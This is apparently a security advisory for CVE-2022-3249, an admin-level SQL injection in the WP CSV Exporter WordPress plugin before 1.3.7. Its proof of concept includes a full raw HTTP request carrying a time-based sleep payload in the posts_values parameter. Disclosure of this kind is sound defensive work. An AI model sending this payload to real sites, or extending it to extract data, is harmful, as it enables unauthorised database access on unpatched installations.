WP CSV Exporter < 1.3.7 – Admin+ SQLi | CVE 2022-3249

Description

The plugin does not properly sanitise and escape some parameters before using them in a SQL statement, allowing high privilege users such as admin to perform SQL injection attacks

Proof of Concept

As an admin, go to Tools > CSV Export, leave everything as default and click on Export POSTS CSV

Intercept the request made and change the posts_values%5B%5D=post_name to posts_values%5B%5D=post_name%2c(select*from(select(sleep(5)))a)

This will delay the response of 5s

Raw request:

POST /wp-content/plugins/wp-csv-exporter/admin/download.php HTTP/1.1
Cookie: [admin+]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 272
Upgrade-Insecure-Requests: 1
Connection: close

_wpnonce=7d0447e58b&post_id=post_id&type=post&posts_values%5B%5D=post_name%2c(select*from(select(sleep(5)))a)&posts_values%5B%5D=7*7&posts_values%5B%5D=post_content&post_status%5B%5D=publish&limit=0&offset=0&order_by=DESC&post_date_from=&post_date_to=&post_modified_from=&post_modified_to=&string_code=UTF-8